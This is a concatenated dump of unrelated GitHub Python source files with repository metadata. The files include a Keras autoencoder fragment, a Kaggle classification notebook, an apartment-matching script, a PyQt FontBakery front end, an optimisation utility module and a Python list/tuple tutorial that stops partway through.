tf.keras.layers.Conv2DTranspose(\n filters = self.conv_filters[layer_index],\n kernel_size = self.conv_kernels[layer_index],\n strides = self.conv_strides[layer_index],\n padding = \"same\",\n name = f\"decoder_conv_transpose_layer_{layer_num}\"\n )\n x = conv_transpose_layer(x)\n x = tf.keras.layers.ReLU( name = f\"decoder_relu_{layer_num}\")(x)\n x = tf.keras.layers.BatchNormalization(name = f\"decoder_bn_{layer_num}\")(x)\n return x\n\n def _add_decoder_output(self, x):\n conv_transpose_layer = tf.keras.layers.Conv2DTranspose(\n filters = 1,\n kernel_size = self.conv_kernels[0],\n strides = self.conv_strides[0],\n padding = \"same\",\n name = f\"decoder_conv_transpose_layer_{self._num_conv_layers}\"\n )\n x = conv_transpose_layer(x)\n output_layer = tf.keras.layers.Activation(\"sigmoid\", name=\"sigmoid_layer\")(x)\n return output_layer\n\nif __name__ == \"__main__\":\n args = process_clargs()\n\n if args.sample_arch:\n autoencoder = Autoencoder(\n input_shape = (28, 28, 1),\n conv_filters = (32, 64, 64, 64), # 4 conv layers each with the corresponding number of filters\n # len() of tuples below must be at least that of the above, like here they are both of len() 4. Otherwise you'll get an error.\n conv_kernels = (3, 3, 3, 3),\n conv_strides = (1, 2, 2, 1), # stride 2 in conv layers means downsampling (halving) at that point\n dim_latent = 10\n )\n autoencoder.summary()","repo_name":"Aimxsys/Aimx","sub_path":"Audex/ae.py","file_name":"ae.py","file_ext":"py","file_size_in_byte":13225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71050038971","text":"# Define import\n\n\n\nimport numpy as np # linear algebra\n\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\n\n\n\nfrom sklearn.preprocessing import StandardScaler\n\nfrom sklearn.preprocessing import LabelEncoder\n\nfrom keras.models import Sequential\n\nfrom keras.layers import Dense, Dropout\n\nfrom keras.callbacks import EarlyStopping\n\nfrom keras.regularizers import l2\n\nfrom keras import optimizers\n\n\n\nimport matplotlib.pyplot as plt\n\n\n\n# Input data files are available in the \"../input/\" directory.\n\n# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory\n\n\n\nimport os\n\nprint(os.listdir(\"../input\"))\n\n# Import data\n\ntrain_input = pd.read_csv(\"../input/train.csv\")\n\ntest_input = pd.read_csv(\"../input/test.csv\")\n\ntrain_input.head()\n#Training Data input(x) and output(y)\n\ntrain_x = train_input.drop(['ID_code', 'target'], axis = 1)\n\ntrain_y = train_input['target']\n#Test Data input(x)\n\ntest_x = test_input.drop(['ID_code'], axis = 1)\n#standardized input\n\nss = StandardScaler()\n\ntrain_x_scaled = ss.fit_transform(train_x)\n\ntest_x_scaled = ss.transform(test_x)\n#Label encoded output\n\nencoder = LabelEncoder()\n\nencoder.fit(train_y)\n\ntrain_y_encoded = encoder.transform(train_y)\n#Definining the NN model\n\nmodel = Sequential()\n\nmodel.add(Dense(200, activation='relu', kernel_initializer='normal', kernel_regularizer=l2(0.001)))\n\nmodel.add(Dropout(0.4))\n\nmodel.add(Dense(50, activation='relu', kernel_regularizer=l2(0.001)))\n\nmodel.add(Dense(1, activation='sigmoid'))\n#Defining optimizer\n\n_opt= 'adam'\n\n_loss = 'binary_crossentropy'\n\n#complie model\n\nmodel.compile(loss=_loss, optimizer=_opt, metrics=['accuracy'])\n# Early stopping \n\n#from keras.callbacks import EarlyStopping\n\n_es_monitor = 'val_loss'\n\n_es_patience = 10\n\nes = EarlyStopping(monitor=_es_monitor, mode='min', verbose=1, patience=_es_patience)\n#batch size and number of epchos \n\n_batch_size = 1\n\n_epochs = 100\n#Train model\n\nhistory = model.fit(train_x_scaled, train_y_encoded, validation_split=0.20,\n\n epochs=_epochs, batch_size = len(train_x_scaled), verbose=1, callbacks=[es])\n#Evaluate Model's accuracy\n\nmetrics = model.evaluate(train_x_scaled, train_y_encoded)\n\nprint(\"\\n%s: %.2f%%\" % (model.metrics_names[1], metrics[1]*100))\n# Plot accuracy - Training vs Validation\n\nimport matplotlib.pyplot as plt\n\nplt.plot(history.history['acc'], label='train')\n\nplt.plot(history.history['val_acc'], label='test')\n\nplt.title('Accuracy - Training vs Validation')\n\nplt.ylabel('Accuracy')\n\nplt.xlabel('Epoch')\n\nplt.legend(['Train', 'Test'], loc='lower right')\n\nplt.show()\n\n# Plot loss - Training vs Validation\n\nimport matplotlib.pyplot as plt\n\n\n\nplt.plot(history.history['loss'], label='train loss')\n\nplt.plot(history.history['val_loss'], label='test loss')\n\nplt.title('Loss - Training vs Validation')\n\nplt.ylabel('Loss')\n\nplt.xlabel('Epoch')\n\nplt.legend(['Train', 'Test'], loc='upper right')\n\nplt.show()\n# Model predict on Test data\n\npredict = model.predict(test_x_scaled)\n\nresult = pd.DataFrame({\"ID_code\": pd.read_csv(\"../input/test.csv\")['ID_code'], \"target\": predict[:,0]})\n\nprint(result.head())\n\n\n\nresult.to_csv(\"submission.Arnab.Mar152019.4.csv\", index=False)","repo_name":"aorursy/new-nb-1","sub_path":"arnabdan_nn-dropouts-early-stopping-acc-loss-plots.py","file_name":"arnabdan_nn-dropouts-early-stopping-acc-loss-plots.py","file_ext":"py","file_size_in_byte":3202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41328987131","text":"# Swap\r\n\r\n# embedded list\r\nPosts = [['NJ', '1b', '1br', '$500', 'yes', 'yes'], ['NJ', '3b', '1br', '$700', 'no', 'yes'], ['NY', '2b', '2br', '$600', 'yes', 'yes'], ['NY', '3b', '2br', '$1000', 'no', 'no'], ['PA', '2b', '1br', '$300', 'no', 'yes'], [\r\n 'PA', '2b', '2br', '$500', 'no', 'no'], ['DE', '4b', '2br', '$1100', 'yes', 'yes'], ['DE', '1b', '1br', '$200', 'no', 'no'], ['MA', '2b', '2br', '$700', 'yes', 'yes'], ['MA', '2b', '2br', '$650', 'no', 'yes']]\r\n\r\n# login with my_django_app\r\n\r\n# start program\r\n\r\nprint(\"Welcome to the Swap Apartment Finder! Please answer the following questions so we can match you with a place to stay! (Please type responses exactly how shown in Options)\")\r\n\r\nstate = input(\r\n \"What state are you looking for? (Options are NJ, NY, PA, DE, MA):\")\r\nprint(\"State: \" + state)\r\n\r\nbedrooms = input(\"How many bedrooms are you looking for? (Options are 1-4):\")\r\nprint(\"Bedrooms: \" + bedrooms)\r\n\r\nbathrooms = input(\"How many bathrooms are you looking for? (Options are 1-2):\")\r\nprint(\"Bathroom: \" + bathrooms)\r\n\r\nprice = input(\"What is you max price? (Do not enter $):\")\r\nprint(\"Price: \" + price)\r\n\r\npets = input(\"Pets? (Options are yes or no):\")\r\nprint(\"Pets: \" + pets)\r\n\r\nutilities = input(\"Utilities included? (Options are yes or no):\")\r\nprint(\"Utilities: \" + utilities)\r\n\r\n\r\nnewL = []\r\n\r\nfor i in Posts:\r\n if i[0] == state:\r\n newL.append(i)\r\n\r\nnewL2 = []\r\n\r\nfor i in newL:\r\n if i[1] >= bedrooms:\r\n newL2.append(i)\r\n\r\nnewL3 = []\r\n\r\nfor i in Posts:\r\n if i[2] >= bathrooms:\r\n newL3.append(i)\r\n\r\nnewL4 = []\r\n\r\nfor i in newL:\r\n if i[3] <= price:\r\n newL4.append(i)\r\n\r\nnewL5 = []\r\n\r\nfor i in Posts:\r\n if i[4] == pets:\r\n newL5.append(i)\r\n\r\nnewL6 = []\r\n\r\nfor i in newL:\r\n if i[5] == utilities:\r\n newL6.append(i)\r\n\r\nif newL6:\r\n print(\"Here are the available listings that match you criteria: \")\r\n print(newL6)\r\n\r\nelse:\r\n print(\"Oops! There are no available apartments fitting your criteria.\")\r\n","repo_name":"krtribel/CPE551_FinalProject","sub_path":"#Swap.py","file_name":"#Swap.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27516940095","text":"import inject\nfrom utils.config import Config\n\nfrom api.auth.service.google_oauth2_service import GoogleOAuth2Service\nfrom api.database.database_connection_manager import DatabaseConnectionManager\nfrom api.database.mysql_connection_manager import MySQLConnectionManager\nfrom api.user.repository.user_repository import UserRepository\nfrom api.user.service.user_service import UserService\n\n\nclass APIInitializer:\n \"\"\"\n This class is responsible for initializing the application with necessary dependencies.\n\n Args:\n phase (str): The current phase of the application (e.g. development, production)\n \"\"\"\n\n def __init__(self, phase: str):\n self.phase = phase\n inject.configure(self._bind)\n\n def _bind(self, binder: inject.Binder):\n \"\"\"\n Binds the necessary dependencies for the application.\n\n Args:\n binder (inject.Binder): The binder object to bind the dependencies.\n \"\"\"\n\n # 1. bind config\n config = Config(self.phase)\n binder.bind(Config, config)\n\n # 2. bind database connection\n database_connection = MySQLConnectionManager(config=config)\n binder.bind(DatabaseConnectionManager, database_connection)\n\n # 3. bind repositories\n user_repository = UserRepository(database=database_connection)\n binder.bind(UserRepository, user_repository)\n\n # 4. bind services\n user_service = UserService(user_repository=user_repository)\n binder.bind(UserService, user_service)\n\n google_oauth2_service = GoogleOAuth2Service(\n config=config, user_repository=user_repository\n )\n binder.bind(GoogleOAuth2Service, google_oauth2_service)\n","repo_name":"kkjsw17/mas-server-v2","sub_path":"mas-api/api/api_initializer.py","file_name":"api_initializer.py","file_ext":"py","file_size_in_byte":1705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24433831504","text":"import sys\nfrom PyQt5.QtWidgets import (\n QApplication,\n QLabel,\n QVBoxLayout,\n QHBoxLayout,\n QWidget,\n QComboBox,\n QDialog,\n QDialogButtonBox,\n QMessageBox,\n QProgressBar,\n QPushButton,\n QFileDialog\n)\nfrom PyQt5.QtCore import QThread, QSettings, Qt, QSize\nfrom PyQt5.QtGui import QFont\nfrom PyQt5.QtWebEngineWidgets import QWebEngineView\nimport re\nimport subprocess\nimport sys\nimport platform\nimport os\nfrom fontbakery.commands.check_profile import log_levels\nfrom fontbakery.profile import get_module_profile\nfrom importlib import import_module\n\nif platform.system() == \"Windows\":\n import win32clipboard\n\nos.environ[\"QT_MAC_WANTS_LAYER\"] = \"1\"\n\nprint(sys.path)\n\nimport site # Needed for py2app\n\nfrom qfontbakery.selfupdate import needs_update, update_dialog\nfrom qfontbakery.dragdrop import DragDropArea\nfrom qfontbakery.fbinterface import FontbakeryRunner\n\n# Make hidden imports visible, for pyinstaller\nimport fontbakery.profiles.googlefonts\nimport fontbakery.profiles.adobefonts\nimport fontbakery.profiles.notofonts\nimport fontbakery.profiles.opentype\nimport fontbakery.profiles.universal\n\nfrom fontbakery.cli import CLI_PROFILES\n\nclass CheckCombo(QComboBox):\n def __init__(self, profile):\n super().__init__()\n imported = import_module(\"fontbakery.profiles.\"+profile)\n profile = get_module_profile(imported)\n self.setMaxVisibleItems(10)\n self.setStyleSheet(\"combobox-popup: 0;\")\n self.profile = profile\n for _, section in profile._sections.items():\n self.addItem(section.name)\n item = self.model().item(self.count()-1,0)\n font = QFont()\n font.setBold(True)\n item.setFont(font)\n item.setFlags(item.flags() & ~Qt.ItemIsSelectable)\n item.setCheckState(Qt.Unchecked)\n\n for check in section._checks:\n self.addItem(check.description,userData = check.id)\n item = self.model().item(self.count()-1,0)\n item.setFlags(Qt.ItemIsUserCheckable | Qt.ItemIsEnabled)\n item.setCheckState(Qt.Checked)\n self.adjustSize()\n\n def checked_checks(self):\n rv = []\n for i in range(0, self.count()):\n item = self.model().item(i)\n if item.checkState() != Qt.Checked or not self.itemData(i):\n continue\n rv.append(self.itemData(i))\n return rv\n\n def sizeHint(self):\n return self.minimumSizeHint()\n\n def minimumSizeHint(self):\n return QSize(50, super().minimumSizeHint().height())\n\n\nclass ResultsWidget(QWidget):\n def __init__(self, html, markdown):\n super(ResultsWidget, self).__init__()\n self.markdown = markdown\n QBtn = QDialogButtonBox.Ok\n self.layout = QVBoxLayout()\n self.webrenderer = QWebEngineView()\n self.webrenderer.setHtml(html)\n self.layout.addWidget(self.webrenderer)\n self.setMinimumHeight(400)\n\n if platform.system() in [\"Darwin\", \"Windows\"]:\n self.mdbutton = QPushButton(\"Copy Markdown to clipboard\")\n self.mdbutton.clicked.connect(self.md_to_clipboard)\n self.layout.addWidget(self.mdbutton)\n self.setLayout(self.layout)\n\n def md_to_clipboard(self):\n if platform.system() == \"Darwin\":\n self.setClipboardDataMac(self.markdown)\n else:\n self.setClipboardDataWin(self.markdown)\n self.mdbutton.setText(\"Copied!\")\n\n def setClipboardDataWin(self, data):\n win32clipboard.EmptyClipboard()\n win32clipboard.SetClipboardData(win32clipboard.CF_TEXT, data)\n\n def setClipboardDataMac(self, data):\n p = subprocess.Popen(['pbcopy'], stdin=subprocess.PIPE)\n p.stdin.write(data.encode(\"utf-8\"))\n p.stdin.close()\n retcode = p.wait()\n\nclass MainWindow(QWidget):\n def __init__(self):\n super(QWidget, self).__init__()\n self.settings = QSettings()\n geometry = self.settings.value('mainwindowgeometry', '')\n if geometry:\n self.restoreGeometry(geometry)\n self.vlayout = QVBoxLayout()\n self.layout = QVBoxLayout()\n self.left = QWidget()\n self.left.setLayout(self.vlayout)\n self.right = QWidget()\n self.layout.addWidget(self.left)\n self.layout.addWidget(self.right)\n self.setLayout(self.layout)\n self.vlayout.addWidget(QLabel(\"Choose profile to check:\"))\n self.profilewidget = QComboBox()\n for p in CLI_PROFILES:\n self.profilewidget.addItem(p)\n last_used_profile = self.settings.value(\"last_used_profile\", \"\")\n if last_used_profile:\n self.profilewidget.setCurrentText(last_used_profile)\n self.vlayout.addWidget(self.profilewidget)\n\n self.profilewidget.currentIndexChanged.connect(self.profile_changed)\n\n self.vlayout.addWidget(QLabel(\"Choose checks to run:\"))\n self.checkwidget = CheckCombo(self.profilewidget.currentText())\n self.vlayout.addWidget(self.checkwidget)\n\n self.vlayout.addWidget(QLabel(\"Choose level of output:\"))\n self.loglevelwidget = QComboBox()\n for l in log_levels.keys():\n self.loglevelwidget.addItem(l)\n self.loglevelwidget.setCurrentText(\"INFO\")\n self.vlayout.addWidget(self.loglevelwidget)\n\n self.vlayout.addWidget(DragDropArea(self))\n\n self.progress = QProgressBar(self)\n self.progress.setMinimum(0)\n self.progress.setMaximum(100)\n self.progress.setValue(0)\n self.vlayout.addWidget(self.progress)\n self.vlayout.addStretch()\n\n def run_fontbakery(self, paths):\n self.progress.setValue(0)\n # Setup the worker object and the worker_thread.\n profilename = self.profilewidget.currentText()\n loglevel = log_levels[self.loglevelwidget.currentText()]\n self.settings.setValue('last_used_profile', profilename)\n print(\"checked_checks\", self.checkwidget.checked_checks())\n self.worker = FontbakeryRunner(profilename, [loglevel], paths, checks=self.checkwidget.checked_checks())\n self.worker_thread = QThread()\n self.worker.moveToThread(self.worker_thread)\n self.worker_thread.started.connect(self.worker.start)\n self.worker.signalStatus.connect(self.show_results)\n self.worker.progressStatus.connect(self.update_progress)\n self.worker_thread.start()\n\n def update_progress(self, value):\n self.progress.setValue(int(value))\n\n def show_results(self, html, md):\n self.worker_thread.quit()\n self.layout.removeWidget(self.right)\n self.right.deleteLater()\n self.right = ResultsWidget(html, md)\n self.layout.addWidget(self.right)\n\n def profile_changed(self):\n index = self.vlayout.indexOf(self.checkwidget)\n self.vlayout.removeWidget(self.checkwidget)\n self.checkwidget.deleteLater()\n self.checkwidget = CheckCombo(self.profilewidget.currentText())\n self.vlayout.insertWidget(index, self.checkwidget)\n\n def closeEvent(self, event):\n geometry = self.saveGeometry()\n self.settings.setValue('mainwindowgeometry', geometry)\n\n\n# # start my_app\nmy_app = QApplication(sys.argv)\nmy_app.setApplicationName(\"FontBakery\")\nmy_app.setOrganizationDomain(\"fonts.google.com\")\n\nmainwindow = MainWindow()\nmainwindow.raise_()\nmainwindow.adjustSize()\nmainwindow.setMinimumWidth(400)\nmainwindow.show()\nver = needs_update()\nif ver:\n update_dialog(ver)\nsys.exit(my_app.exec_())\n","repo_name":"googlefonts/fontbakery-ui","sub_path":"qfontbakery.py","file_name":"qfontbakery.py","file_ext":"py","file_size_in_byte":7543,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"78"} +{"seq_id":"24359111369","text":"# Floating point numbers are created with decimal points\n1.0\n1.5\n1000.1\n\n# They are not precise (note how they get progressively more wrong)\nnum = 0.0\nfor i in range(100):\n num += .01\n print(num)\n\n# Adding integers and floats returns a float\nprint(1 + 1.0)\n\n1 + 1 # addition\n1 - 1 # subtraction\n2 * 2 # multiplication\n10/5 # divison (returns float)\n10//3 # integer divison (returns integer)\n10 % 3 # modulo, returns remainder\n2**4 # exponential","repo_name":"vierth/hcs","sub_path":"somemath.py","file_name":"somemath.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"29146133215","text":"import math\r\nfrom scipy import integrate\r\nfrom pulp import *\r\n\r\n\r\nclass methods:\r\n\r\n def Qi_percent():\r\n Qi1 = -168\r\n Qi2 = 16968\r\n for i in range(77):\r\n Qi1 += 168\r\n Qi2-=168\r\n print('port 1 cargo shipment in month:', Qi1)\r\n print('port 2 cargo shipment in month:', Qi2)\r\n\r\n def Zi(Pi, Q2, diOd):\r\n Z2 = Pi * Q2 * diOd\r\n return Z2\r\n\r\n def my_ui_func(u):\r\n return math.exp(-u ** 2)\r\n\r\n def BodRo(f, diOd, Di, EF, LF, Qi, V, phi):\r\n EL_Ro = 2.547 + 4 + 0.03 + 2 + 1.65\r\n BodRo = (f * diOd * Di * (EF * LF * EL_Ro + phi * EL_Ro)) / (Qi * V * phi * 1e6)\r\n return BodRo\r\n\r\n def BodRao(f_tilde, dOs, Di, EF_tilde, LF, Qi, V_tilde, phi, f, dOd, V, EF):\r\n ELRa = 2.547 + 2.01 + 0.134 + 7.37 + 0.402\r\n ELRo = 2.547 + 4 + 0.03 + 2 + 1.65\r\n BodRao = (f_tilde * dOs * Di * (EF_tilde * LF * ELRa + phi * ELRa)) / (Qi * V_tilde * phi) + \\\r\n (f * (dOd - dOs) * Di * (EF * LF * ELRo + phi * ELRo)) / (Qi * V * phi * 1e6)\r\n return BodRao\r\n\r\n def A(alpha, C, BodRo, BodRao):\r\n A = alpha * C * (BodRo - BodRao)\r\n return A\r\n\r\n def B(tau, C, BodRo, BodRao):\r\n B = tau * C * (BodRo - BodRao)\r\n return B\r\n\r\n def THi(Oi, Di, j):\r\n THij = Oi * Di ** j\r\n return THij\r\n\r\n def TC_i(DXi, xi, eps_Ro, eps_Ra, diOs, diOd):\r\n\r\n TCi1 = DXi * xi * (eps_Ro * (diOd - diOs) + eps_Ra * diOs)\r\n TCi2 = eps_Ro * DXi * xi * diOd\r\n TCi = TCi1 - TCi2\r\n return TCi\r\n\r\n def Ki(Di, Qi, ni):\r\n Ki = (Di - Qi) / ni\r\n return Ki\r\n\r\n def HRi(R, Ki):\r\n HRi = R * Ki\r\n return HRi\r\n\r\n def TCi(TCi0, TCi, HRi):\r\n TCi = TCi0 + TCi + HRi\r\n return TCi\r\n\r\n def Ei(Di, Qi, Hi, j):\r\n Eij = (Di - Qi) * Hi ** j\r\n return Eij\r\n\r\n def Pi(Zi, A, B, TCi):\r\n Pi1 = Zi + A - TCi\r\n Pi2 = Zi - B - TCi\r\n Pi = Pi1 - Pi2\r\n return Pi\r\n\r\n def TGR(Di, Pi, diOd, tau, omega, alpha):\r\n TGR = 0\r\n for i in range(1, 3):\r\n TGR += diOd[i-1] * Di[i-1] * Pi[i-1] * (tau - omega - alpha)\r\n return TGR\r\n\r\n def TSW(pi_list, ui_func, u_start, u_end):\r\n TSW = sum(pi_list)\r\n TSW += integrate.quad(ui_func, u_start, u_end)[0]\r\n return TSW\r\n\r\n def TER(BodRo, BodRao):\r\n TER = sum(BodRo) + sum(BodRao)\r\n return TER\r\n\r\n def max_tgr(L_TSW, L_TER):\r\n prob = LpProblem(\"Max TGR\", LpMaximize)\r\n\r\n TSW = LpVariable(\"TSW\", lowBound=None)\r\n TER = LpVariable(\"TER\", lowBound=None)\r\n TGR = LpVariable(\"TGR\", lowBound=None)\r\n\r\n prob += TGR\r\n\r\n prob += TSW >= L_TSW\r\n prob += TER <= L_TER\r\n\r\n prob.solve()\r\n\r\n status = LpStatus[prob.status]\r\n tgr = value(TGR.varValue)\r\n tsw = value(TSW.varValue)\r\n ter = value(TER.varValue)\r\n return status, tgr, tsw, ter\r\n\r\n\r\n def max_tsw(L_TGR, L_TER):\r\n prob = LpProblem(\"Max TSW\", LpMaximize)\r\n\r\n TSW = LpVariable(\"TSW\", lowBound=None)\r\n TER = LpVariable(\"TER\", lowBound=None)\r\n TGR = LpVariable(\"TGR\", lowBound=None)\r\n\r\n prob += TSW\r\n\r\n prob += TGR >= L_TGR\r\n prob += TER <= L_TER\r\n\r\n prob.solve()\r\n\r\n status = LpStatus[prob.status]\r\n tsw = value(TSW.varValue)\r\n tgr = value(TGR.varValue)\r\n ter = value(TER.varValue)\r\n return status, tsw, tgr, ter\r\n\r\n def min_ter(L_TGR, L_TSW):\r\n prob = LpProblem(\"Min TER\", LpMinimize)\r\n\r\n TSW = LpVariable(\"TSW\", lowBound=None)\r\n TER = LpVariable(\"TER\", lowBound=None)\r\n TGR = LpVariable(\"TGR\", lowBound=None)\r\n\r\n prob += TER\r\n\r\n prob += TGR >= L_TGR\r\n prob += TSW >= L_TSW\r\n\r\n prob.solve()\r\n\r\n status = LpStatus[prob.status]\r\n ter = value(TER.varValue)\r\n tgr = value(TGR.varValue)\r\n tsw = value(TSW.varValue)\r\n return status, ter, tgr, tsw\r\n\r\n#RL\r\nclass rl:\r\n\r\n def find_min_max(triad_list):\r\n\r\n min_triad = triad_list[0]\r\n max_triad = triad_list[0]\r\n\r\n for triad in triad_list:\r\n\r\n if triad < min_triad:\r\n min_triad = triad\r\n\r\n if triad > max_triad:\r\n max_triad = triad\r\n\r\n triad_list = max_tgr, max_tsw, min_ter\r\n min_triad, max_triad = find_min_max(triad_list)\r\n\r\n print(\":\", min_triad)\r\n print(\":\", max_triad)\r\n\r\n return (min_triad, max_triad)\r\n\r\n#CART\r\nclass cart:\r\n\r\n def find_min_max(triad_list):\r\n\r\n triad_int_list = [int(triad.replace(\"T\", \"\")) for triad in triad_list]\r\n\r\n min_triad = triad_int_list[0]\r\n max_triad = triad_int_list[0]\r\n\r\n for triad in triad_int_list:\r\n\r\n if triad < min_triad:\r\n min_triad = triad\r\n\r\n if triad > max_triad:\r\n max_triad = triad\r\n\r\n min_triad_str = \"T\" + str(min_triad)\r\n max_triad_str = \"T\" + str(max_triad)\r\n\r\n triad_list = ['max_tgr', 'max_tsw', 'min_ter']\r\n\r\n min_triad, max_triad = find_min_max(triad_list)\r\n\r\n print(\":\", min_triad)\r\n print(\":\", max_triad)\r\n\r\n return (min_triad_str, max_triad_str)\r\n\r\n#C4.5\r\nclass c45:\r\n\r\n def entropy(class_counts):\r\n\r\n total_count = sum(class_counts)\r\n entropy = 0\r\n\r\n for count in class_counts:\r\n if count == 0:\r\n continue\r\n frequency = count / total_count\r\n entropy += -frequency * math.log2(frequency)\r\n\r\n return entropy\r\n\r\n def split_data(data, attribute_index):\r\n\r\n split_data = {}\r\n\r\n for instance in data:\r\n attribute_value = instance[attribute_index]\r\n if attribute_value not in split_data:\r\n split_data[attribute_value] = []\r\n split_data[attribute_value].append(instance)\r\n\r\n return split_data\r\n\r\n def choose_attribute(data, attribute_indices):\r\n\r\n class_counts = {}\r\n\r\n for instance in data:\r\n class_label = instance[-1]\r\n if class_label not in class_counts:\r\n class_counts[class_label] = 0\r\n class_counts[class_label] += 1\r\n\r\n base_entropy = entropy(list(class_counts.values()))\r\n\r\n best_attribute_index = None\r\n best_information_gain = 0\r\n\r\n for attribute_index in attribute_indices:\r\n attribute_values = set([instance[attribute_index] for instance in data])\r\n attribute_entropy = 0\r\n\r\n for attribute_value in attribute_values:\r\n attribute_data = [instance for instance in data if instance[attribute_index] == attribute_value]\r\n attribute_frequency = len(attribute_data) / len(data)\r\n attribute_entropy += attribute_frequency * entropy([count for value, count in\r\n class_counts.items() if any(instance[-1] == value\r\n for instance in attribute_data)])\r\n\r\n information_gain = base_entropy - attribute_entropy\r\n\r\n if information_gain > best_information_gain:\r\n best_attribute_index = attribute_index\r\n best_information_gain = information_gain\r\n\r\n return best_attribute_index\r\n\r\n def majority_class(class_labels):\r\n\r\n class_counts = {}\r\n\r\n for class_label in class_labels:\r\n if class_label not in class_counts:\r\n class_counts[class_label] = 0\r\n class_counts[class_label] += 1\r\n\r\n return max(class_counts, key=class_counts.get)\r\n\r\n def c45(data, attribute_indices):\r\n\r\n class_labels = [instance[-1] for instance in data]\r\n\r\n if len(set(class_labels)) == 1:\r\n return class_labels[0]\r\n\r\n if not attribute_indices:\r\n return majority_class(class_labels)\r\n\r\n chosen_attribute_index = choose_attribute(data, attribute_indices)\r\n tree = {chosen_attribute_index: {}}\r\n attribute_indices.remove(chosen_attribute_index)\r\n\r\n for attribute_value, attribute_data in split_data(data, chosen_attribute_index).items():\r\n subtree = c45(attribute_data, attribute_indices[:])\r\n tree[chosen_attribute_index][attribute_value] = subtree\r\n\r\n return tree\r\n\r\n def find_min_max(triad_list):\r\n\r\n triad_int_list = [int(triad.replace(\"T\", \"\")) for triad in triad_list]\r\n\r\n data = [[triad] for triad in triad_int_list]\r\n\r\n for instance in data:\r\n instance.append(0)\r\n\r\n attribute_indices = [0] \r\n tree = c45(data, attribute_indices)\r\n\r\n current_node = tree\r\n\r\n while isinstance(current_node, dict):\r\n attribute_index = list(current_node.keys())[0]\r\n subtree_key = str(min(triad_int_list)) if \"T\" + str(min(triad_int_list)) in current_node[attribute_index] else str(max(triad_int_list))\r\n current_node = current_node[attribute_index][subtree_key]\r\n\r\n min_triad_str = \"T\" + str(current_node)\r\n max_triad_str = \"T\" + str(current_node)\r\n\r\n return (min_triad_str, max_triad_str)","repo_name":"ArmagBi/GasPrice_Analysis","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31282025500","text":"# -*- coding: utf-8 -*-\n\n###########################################################################\n#\n# _ _____ _____ _______\n# | | |_ _|/ ____|__ __|\n# | | | | | (___ | |\n# | | | | \\___ \\ | |\n# | |____ _| |_ ____) | | |\n# |______|_____|_____/ |_|\n#\n#\n###########################################################################\n\n###\n#\n# List is a mutable sequence-like data structure\n# Complexity of element access O(1)\n# Complexity of element change O(1)\n# Complexity of element appending O(1) (amortized case)\n# Complexity of element deletion O(n)\n#\n##\n\n# list declaration\na = [1, 2, 3, 4]\n\n# entries in list can be of any type, a not all of them have to be of same color\na = [1, 2, \"string\", 3, 4]\na = [1, 2, [3, 4], \"string\", 5, 6, 7]\n\n# accessing list element\n# list indexing starts with 0\nanswer = a[0] # answer = 0\nanswer = a[2] # answer = [3, 4]\n\n# list slicing\n# one can obtain a subsequence from original list\n# specified subsequence range is inclusive on the left, but non-inclusive on the right\nanswer = a[0:2] # answer = [1, 2]\nanswer = a[1:3] # answer = [2, [3, 4]]\n\n# one can specify the gap / step for elements to be taken from the range with\nanswer = a[0:4:2] # answer = [1, [3, 4]]\nanswer = a[0:6:3] # answer = [1, \"string\"]\n\n# you can access elements from the end of list with negative indexing\nanswer = a[-1] # answer = 7\nanswer = a[-5] # answer = [3, 4]\nanswer = a[8:0:-1] # answer = [7, 6, 5, \"string\", [3, 4], 2]\n\n# one can omit star / end indices when slicing\nanswer = a[:2] # answer = [1, 2]\nanswer = a[:4:2] # answer = [1, [3, 4]]\n\n# to change the element at certain position just assign a new value with a specific index\na = [1, 2, 3, 4, 5, 6, 7]\na[2] = 3.5 # a = [1, 2, 3.5, 4, 5, 6, 7]\na[:2] = [2, 1] # a = [2, 1, 3.5, 4, 5, 6, 7]\n\n# when a list is assigned to several variables, they refer to the same object and changes in that object are reflected in all variables\na = [1, 2, 3, 4]\nb = a\na[2] = 2.5\nanswer = b[2] # answer = 2.5\n\n# deleting an element by its index\nanswer = a # answer = [1, 2.5, 3, 4]\ndel a[0]\nanswer = a # answer = [2.5, 3, 4]\n\n# One can construct a list in multiple ways.\n# Simplest way is to create a new empty list and then use a method append / insert to add elements into it\na = []\na.append(1) # a = [1]\na.append(2) # a = [1, 2]\na.insert(0, -1) # a = [-1, 2, 2]\n\n# another way to create a new list is to use so called list comprehension\n# this is usually used when there is a need to create a new collection from already existing one\na = [str(x) for x in [1, 2, 3, 4]] # a = ['1', '2', '3', '4']\n# one can also put conditions into such list creation, thus utilizing the filter pattern\na = [str(x) for x in [1, 2, 3, 4] if x % 2 == 0] # a = ['2', '4']\n\n# list comprehension can be nested (more than 2 levels of iterations are not encouraged in list comprehension)\na = [str(x * y) for y in [1, 2, 3] for x in [1, 2, 3, 4] if x % 2 == 0] # a = ['2', '4', '4', '8', '6', '12']\n# a = ['1 * 2', '1 * 4', '2 * 2', '2 * 4', '3 * 2', '3 * 4']\n\n###########################################################################\n#\n# _______ _\n# |__ __| | |\n# | |_ _ _ __ | | ___\n# | | | | | '_ \\| |/ _ \\\n# | | |_| | |_) | | __/\n# |_|\\__,_| .__/|_|\\___|\n# | |\n# |_|\n#\n###########################################################################\n\n###\n#\n# Tuple is a Immutable sequence-like data structure\n# Complexity of element access O(1)\n#\n##\n\n# tuples correspond to the unchanging sequences of objects\na = (1, \"string\", [1, 2], 4)\n\n# accessing elements works the same way the list elements accessing works\nanswer = a[3] # answer = 4\n\n# you can not reassign a new element to the specific spot in the tuple\n# THIS LINE IS A PROGRAMMING ERROR\na[1] = 3\n\n# if a tuple entry itself is mutable (like list), it can be changed internally, while the tuple structure will be intact\nanswer = a[2] # answer = [1, 2], a = (1, \"string\", 